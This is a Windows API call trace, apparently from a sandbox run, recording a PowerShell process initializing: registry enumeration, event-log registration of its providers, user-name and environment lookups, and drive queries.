	[0217.561] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x1640a0, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.561] CoTaskMemFree (pv=0x1640a0) 
	[0217.561] CoTaskMemFree (pv=0x0) 
	[0217.561] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0217.561] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x1640a0, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.561] CoTaskMemFree (pv=0x1640a0) 
	[0217.561] CoTaskMemFree (pv=0x0) 
	[0217.561] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0217.561] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x1640a0, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.561] CoTaskMemFree (pv=0x1640a0) 
	[0217.561] CoTaskMemFree (pv=0x0) 
	[0217.562] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0217.562] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x1640a0, lpcchName=0x12d628, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d628, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0217.562] CoTaskMemFree (pv=0x1640a0) 
	[0217.562] CoTaskMemFree (pv=0x0) 
	[0217.562] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x344) returned 0x0
	[0217.562] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0217.562] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x348) returned 0x0
	[0217.562] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0217.562] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x34c) returned 0x0
	[0217.562] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0217.562] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x350) returned 0x0
	[0217.562] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0217.562] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x354) returned 0x0
	[0217.562] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0217.562] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x358) returned 0x0
	[0217.562] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x2
	[0217.563] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d688 | out: phkResult=0x12d688*=0x0) returned 0x5
	[0218.299] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b9b0008
	[0219.013] ReportEventW (hEventLog=0x1b9b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f42488*="WSMan", lpRawData=0x2f421f8) returned 1
	[0219.033] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0219.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.033] CoTaskMemFree (pv=0x221840) 
	[0219.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.035] CoTaskMemAlloc (cb=0x804) returned 0x1b8db680
	[0219.035] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8db680, nSize=0x12d8e8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d8e8) returned 0x1
	[0219.036] CoTaskMemFree (pv=0x1b8db680) 
	[0219.036] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0219.036] GetUserNameW (in: lpBuffer=0x1640a0, pcbBuffer=0x12d928 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d928) returned 1
	[0219.036] CoTaskMemFree (pv=0x1640a0) 
	[0219.036] ReportEventW (hEventLog=0x1b9b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f47e18*="Alias", lpRawData=0x2f47ba8) returned 1
	[0219.042] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0219.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.042] CoTaskMemFree (pv=0x221840) 
	[0219.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.044] CoTaskMemAlloc (cb=0x804) returned 0x1b8db680
	[0219.044] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8db680, nSize=0x12d8e8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d8e8) returned 0x1
	[0219.044] CoTaskMemFree (pv=0x1b8db680) 
	[0219.044] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0219.044] GetUserNameW (in: lpBuffer=0x1640a0, pcbBuffer=0x12d928 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d928) returned 1
	[0219.044] CoTaskMemFree (pv=0x1640a0) 
	[0219.045] ReportEventW (hEventLog=0x1b9b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f4d3c0*="Environment", lpRawData=0x2f4d150) returned 1
	[0219.057] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0219.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.057] CoTaskMemFree (pv=0x221840) 
	[0219.058] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0219.058] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0219.058] CoTaskMemFree (pv=0x221840) 
	[0219.058] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0219.058] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0219.058] CoTaskMemFree (pv=0x221840) 
	[0219.059] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x12d490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.059] SetErrorMode (uMode=0x1) returned 0x1
	[0219.059] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x12d6a0 | out: lpFileInformation=0x12d6a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.059] SetErrorMode (uMode=0x1) returned 0x1
	[0219.060] GetLogicalDrives () returned 0x4
	[0219.060] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.061] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0219.061] SetErrorMode (uMode=0x1) returned 0x1
	[0219.062] CoTaskMemAlloc (cb=0x68) returned 0x1b8b6890
	[0219.062] CoTaskMemAlloc (cb=0x68) returned 0x1b8b6900
	[0219.062] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b8b6890, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x12d670, lpMaximumComponentLength=0x12d66c, lpFileSystemFlags=0x12d668, lpFileSystemNameBuffer=0x1b8b6900, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12d670*=0x705ba84c, lpMaximumComponentLength=0x12d66c*=0xff, lpFileSystemFlags=0x12d668*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0219.062] CoTaskMemFree (pv=0x1b8b6890) 
	[0219.062] CoTaskMemFree (pv=0x1b8b6900) 
	[0219.062] SetErrorMode (uMode=0x1) returned 0x1
	[0219.063] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0219.064] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.064] SetErrorMode (uMode=0x1) returned 0x1
	[0219.064] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d610 | out: lpFileInformation=0x12d610*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.064] SetErrorMode (uMode=0x1) returned 0x1
	[0219.064] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.064] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d260, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.064] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0219.064] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.064] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0219.065] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.065] SetErrorMode (uMode=0x1) returned 0x1
	[0219.065] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d440 | out: lpFileInformation=0x12d440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.065] SetErrorMode (uMode=0x1) returned 0x1
	[0219.065] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.065] SetErrorMode (uMode=0x1) returned 0x1
	[0219.066] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d440 | out: lpFileInformation=0x12d440*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.066] SetErrorMode (uMode=0x1) returned 0x1
	[0219.066] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x12d280, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.066] SetErrorMode (uMode=0x1) returned 0x1
	[0219.066] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x12d4e0 | out: lpFileInformation=0x12d4e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.066] SetErrorMode (uMode=0x1) returned 0x1
	[0219.066] CoTaskMemAlloc (cb=0x804) returned 0x1b8db680
	[0219.066] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8db680, nSize=0x12d8e8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d8e8) returned 0x1
	[0219.067] CoTaskMemFree (pv=0x1b8db680) 
	[0219.067] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0219.067] GetUserNameW (in: lpBuffer=0x1640a0, pcbBuffer=0x12d928 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d928) returned 1
	[0219.067] CoTaskMemFree (pv=0x1640a0) 
	[0219.067] ReportEventW (hEventLog=0x1b9b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f54418*="FileSystem", lpRawData=0x2f541a8) returned 1
	[0219.072] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0219.072] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.072] CoTaskMemFree (pv=0x221840) 
	[0219.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.073] CoTaskMemAlloc (cb=0x804) returned 0x1b8db680
	[0219.073] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8db680, nSize=0x12d8e8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d8e8) returned 0x1
	[0219.074] CoTaskMemFree (pv=0x1b8db680) 
	[0219.074] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0219.074] GetUserNameW (in: lpBuffer=0x1640a0, pcbBuffer=0x12d928 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d928) returned 1
	[0219.074] CoTaskMemFree (pv=0x1640a0) 
	[0219.074] ReportEventW (hEventLog=0x1b9b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f59c08*="Function", lpRawData=0x2f59998) returned 1
	[0219.089] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0219.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.089] CoTaskMemFree (pv=0x221840) 
	[0225.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.259] CoTaskMemAlloc (cb=0x804) returned 0x1b8de680
	[0225.259] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8de680, nSize=0x12d8e8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d8e8) returned 0x1
	[0225.259] CoTaskMemFree (pv=0x1b8de680) 
	[0225.259] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0225.259] GetUserNameW (in: lpBuffer=0x1640a0, pcbBuffer=0x12d928 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d928) returned 1
	[0225.259] CoTaskMemFree (pv=0x1640a0) 
	[0225.260] ReportEventW (hEventLog=0x1b9b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f8be48*="Registry", lpRawData=0x2f8bbd8) returned 1
	[0225.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.914] CoTaskMemAlloc (cb=0x804) returned 0x1b8de680
	[0225.914] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8de680, nSize=0x12d8e8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d8e8) returned 0x1
	[0225.914] CoTaskMemFree (pv=0x1b8de680) 
	[0225.914] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0225.914] GetUserNameW (in: lpBuffer=0x1640a0, pcbBuffer=0x12d928 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d928) returned 1
	[0225.915] CoTaskMemFree (pv=0x1640a0) 
	[0225.915] ReportEventW (hEventLog=0x1b9b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f91210*="Variable", lpRawData=0x2f90fa0) returned 1
	[0225.924] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0225.924] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.924] CoTaskMemFree (pv=0x221840) 
	[0225.926] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0225.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.927] CoTaskMemFree (pv=0x221840) 
	[0225.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0225.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0225.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0225.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0229.143] CoTaskMemAlloc (cb=0x804) returned 0x1b8de680
	[0229.143] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8de680, nSize=0x12d8e8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x12d8e8) returned 0x1
	[0229.870] CoTaskMemFree (pv=0x1b8de680) 
	[0229.870] CoTaskMemAlloc (cb=0x204) returned 0x1640a0
	[0229.870] GetUserNameW (in: lpBuffer=0x1640a0, pcbBuffer=0x12d928 | out: lpBuffer="aETAdzjz", pcbBuffer=0x12d928) returned 1
	[0229.870] CoTaskMemFree (pv=0x1640a0) 
	[0229.870] ReportEventW (hEventLog=0x1b9b0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fa4dd8*="Certificate", lpRawData=0x2fa4b68) returned 1
	[0230.468] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0230.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.468] CoTaskMemFree (pv=0x221840) 
	[0230.471] GetLogicalDrives () returned 0x4
	[0230.471] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x12d570, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0230.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0230.472] CoTaskMemAlloc (cb=0x20e) returned 0x1b8b8060
	[0230.472] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8b8060 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0230.472] CoTaskMemFree (pv=0x1b8b8060) 
	[0230.473] CoTaskMemAlloc (cb=0x104) returned 0x221840
